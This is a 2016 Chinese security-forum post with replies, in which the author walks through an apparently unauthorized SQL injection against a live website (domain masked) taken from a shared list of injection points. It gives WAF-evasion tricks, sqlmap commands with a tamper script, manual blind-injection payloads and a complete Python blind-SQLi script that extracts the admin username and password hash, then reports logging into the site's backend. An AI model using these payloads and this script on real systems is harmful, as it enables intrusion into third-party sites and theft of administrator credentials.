用户
搜索

该用户从未签到

i春秋-见习白帽

Rank: 3Rank: 3

1

主题

133

帖子

366

魔法币
收听
0
粉丝
2
注册时间
2016-9-6
发表于 2016-12-29 10:42:04 15347457
本帖最后由 猪头肉不清真 于 2016-12-29 14:44 编辑

事情是这样的,上次记得哪个表哥在坛子里发了99999。。。。(此处省略n个9)注入点,我兴致冲冲的下载下来,发现随便打开一个都是
1.png
然后我的心情是这样的:
但是看到999999。。。(此处省略n个9)的注入点,直接扔了也怪可惜的,写一个python脚本跑一下,response响应码只要不是200,不管404,302,统统给我见鬼去,打广告了!哪个表哥需要脚本的私我:)
然后我就发现一个站www.xxxxx.com/cp.asp?classid=71,当我加引号的时候。。。。
哎哟,很屌诶!
没办法了,试一下提交post参数
还是不行。。。。
换一下大小写试一试:
classid=71 And 1=1
这么简单就报错了???别tm逗我。。。
但是好像空格被过滤掉了,加上%20试一试
classid=71%20And%201=1
出图了,看来是返回正常的,那1=2呢?
提交classid=71%20And%201=2
哦,跟想象的一样!迫不及待了,上sqlmap跑一下看看
sqlmap –r url.txt –p classid –tamper randomcase.py
//-r参数是用来把整个http请求复制下来直接带入参数
//-p参数是用来指定注入变量的名字
//--tamper是用来加sqlmap本身的过WAF的一些辅助脚本,其中randomcase.py对大小写敏感
好了经过漫长的等待。。。
蛤蛤,classid确实是可以注入的,最后发现数据库是Access
各位表哥也都知道,Access数据库必须猜出表名和字段名称,否则只能干瞪眼。。。别问我为什么知道,麻痹有一次用啊D的两万字典跑了好久都没猜对字段名,遗憾的半途而废了。。。
sqlmap中自带了不少常用的数据库名和字段名,直接开始好了
sqlmap –r url.txt –p classid –tamper randomcase.py –tables
admin表这么快就出来了,这时候已经可以停了
继续看看admin表下面有什么字段
sqlmap –r url.txt –p classid –tamper randomcase.py –T admin --columns
额。。。admin表中有个字段叫做admin。。。
一般不都是username么???
管他的。看起来non-numeric的字段只有三个,content字段怎么看也不像用户名和密码的样子,剩下的两个。。。那只能是他俩了,对,就你俩!结果。。。。
不知道为什么。。。sqlmap到这死活注入不出来了。。。。
捕获.PNG

看来是sqlmap的异常退出,查找了一下也没有什么有效的解决办法。。。
目前已经得到了表名和字段名,难道就这么结束???
上一下穿山甲吧。。。可是。。。。。穿山甲也宕机了!!!
哎。。。只能祭出手工盲注入这个神器了!
先查一下admin字段的长度
classid=71 And (Select top 1 len(admin) FrOm admin)>4
没报错,继续!And (Select top 1 len(admin) FrOm admin)>5

报错了,看来长度只能是5了
蛤,果然!
可是。。。。妈蛋,用户名5位,密码最少也得16位,搞不好是32位,我这手工怼,密码没注出来,我就死在电脑前了。。。
自己写脚本,上python!
既然已经知道了注入的原理那自己写吧,先分析一下:
如果返回正确,就有图。。。返回不正确,就没有图。
举个栗子:猜具体名称的时候,用的语句是:And (Select top 1 Asc(Mid(admin,1,1)) FrOm admin)> 64
如果返回有图,说明第一个字符的ASCII码大于64,再检测大于65,如果返回没图,说明第一个字符不大于65,那么。。。。一个字符大于64,但是不大于65,就只能等于65了。。。。
ASCII码等于65,那么这个字段的第一个字符就是a了。
看起来用二分查找比较容易,写一下代码的逻辑:
1、  构造POST包发送;
2、  对POST包返回的页面进行抓取,判断是否返回正确,不断缩小范围;
3、  返回字符
把上述逻辑放在字段长度的循环里就行了
这里我用到了BeautifulSoup这个大数据处理的库,能够对html页面进行抓取,还可以和re库共同配合实现正则匹配。感兴趣的同学自己了解一下,下面直接放代码好了:
[Python] 纯文本查看 复制代码
#!/usr/bin/env python  
import urllib2
import sys
import requests
from bs4 import BeautifulSoup

def search2(url,j):  
        low = 47   
        high = 123   
        while(low < high):  
                mid = (low + high)/2  
                if (sendpost(url, mid,j)&(low != high)):
                        low = mid + 1 
                elif (sendpost(url, mid,j)==0)&(low != high): 
                        high = mid - 1
        if (sendpost(url,mid,j)):
                if (sendpost(url, (mid+1),j)):
                        return chr(mid+2)
                return chr(mid+1)
        elif(sendpost(url,mid-1,j)==0):
                if (sendpost(url,mid-2,j)==0):
                        return chr(mid-2)
                return chr(mid-1)
        else: return chr(mid)
                


def sendpost(url,i,j):
        post_data = 'classid=71%20And%20(Select%20top%201%20Asc(Mid(pwd,'+str(j)+',1))%20FrOm%20admin)>'+str(i)
        req = urllib2.urlopen(url,post_data)
        content = req.read()
        moha_then=BeautifulSoup(content,'lxml').find_all('a',attrs={"href":"cp.asp?Product_ID=963"})
        if (moha_then == []):
                return 0
        return 1 
        
if __name__ == "__main__":  
        url = 'http://www.xxxxxxx.com/cp.asp'
        j=1
        #cmd5=[]
        while(j<6):
                #cmd5.append(search2(url, j))
                print search2(url, j)
                j=j+1
        #print cmd5

跑一下:

蛤,用户名是admin
再来跑一下MD5值,原来是21232f297a57a5a743894a0e4a801fc3
迫不及待的解密后。。。

原来是弱口令。。。好尴尬。。。
其实我早就知道是弱口令了,就是为了给大家奉献一下我的渗透流程又重新做了一遍,怎么可能我注入了半天才知道弱口令,不可能的,不会的,蛤蛤蛤蛤蛤蛤蛤

进去后台看了一眼

很无聊的样子,那么这次渗透就到这结束吧,心好累
不过脚本还挺好用的,喜欢的表哥给我点赞哟~~~

评分

参与人数 5魔法币 +135 收起 理由
dwufh + 5 欢迎分析讨论交流,i春秋论坛有你更精彩!.
hhhhhhhiii + 5 厉害了
yyyxy + 100 十分有趣,哈哈
义飞 + 5
W3bSafe团队 + 20 哈哈 思路不错

查看全部评分

本帖被以下淘专辑推荐:

发表于 2017-1-5 16:45:56
文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

奖金点评
50
不错,有实战的过程,有代码示范,不过技术较为常见。


Hacking the earth
使用道具 举报 回复
zusheng 发表于 2017-1-5 16:45
文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

我草草草。。。好激动,前排合影
使用道具 举报 回复
发表于 2016-12-29 15:40:00
猪头肉不清真 发表于 2016-12-29 15:38
大哥,说吧,是欺男还是霸女,东街的刘继芬昨天刚满18,西街的王钢蛋今天刚满20,您来哪个? ...

大哥我从不欺负人。
使用道具 举报 回复
yangwen 发表于 2016-12-29 15:34
你不亏。还不快叫大哥?

大哥,说吧,是欺男还是霸女,东街的刘继芬昨天刚满18,西街的王钢蛋今天刚满20,您来哪个?
使用道具 举报 回复
yangwen 发表于 2016-12-29 15:22
哼  一声大哥一生父   你这个小弟 我收了!

怎么感觉好像吃亏了好多。。。。
使用道具 举报 回复
发表于 2016-12-29 15:22:02
猪头肉不清真 发表于 2016-12-29 14:47
要!司机大哥,开车吧!

哼  一声大哥一生父   你这个小弟 我收了!
使用道具 举报 回复
yyyxy 管理员 六国战旗移动展示平台! 秦 楚 燕 魏 齐 赵
8#
发表于 2016-12-29 11:48:58
哈哈,有探索的精神,给你点赞
欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!投稿请加我QQ:286894635。
i春秋-楚:533191896
i春秋-燕:129821314
i春秋-齐:417360103
i春秋-秦:262108018
使用道具 举报 回复
发表于 2016-12-29 11:52:06
哈哈 思路不错
使用道具 举报 回复
发表于 2016-12-29 11:54:13
很强
使用道具 举报 回复
发表于 2016-12-29 11:54:22
很强
使用道具 举报 回复
发表于 2016-12-29 12:05:25
我是来看隐藏数据的。
使用道具 举报 回复
发表于 2016-12-29 12:36:39
讲的很清楚啊。
使用道具 举报 回复
发表于 2016-12-29 12:51:19
aoliao 发表于 2016-12-29 12:36
讲的很清楚啊。

看看分享,,,。
使用道具 举报 回复
发表于 2016-12-29 13:03:22
比较厉害了
使用道具 举报 回复
发表于 2016-12-29 13:16:47
小伙子  要不要跟我混、?
使用道具 举报 回复
发表于 2016-12-29 13:32:51

小伙子  要不要跟我混、?
使用道具 举报 回复
发表于 2016-12-29 14:15:51
学习学习
使用道具 举报 回复
厉害了
使用道具 举报 回复
发表于 2016-12-29 14:33:35
学习学习
使用道具 举报 回复
yangwen 发表于 2016-12-29 13:16
小伙子  要不要跟我混、?

要!司机大哥,开车吧!
使用道具 举报 回复
您需要登录后才可以回帖 登录 | 立即注册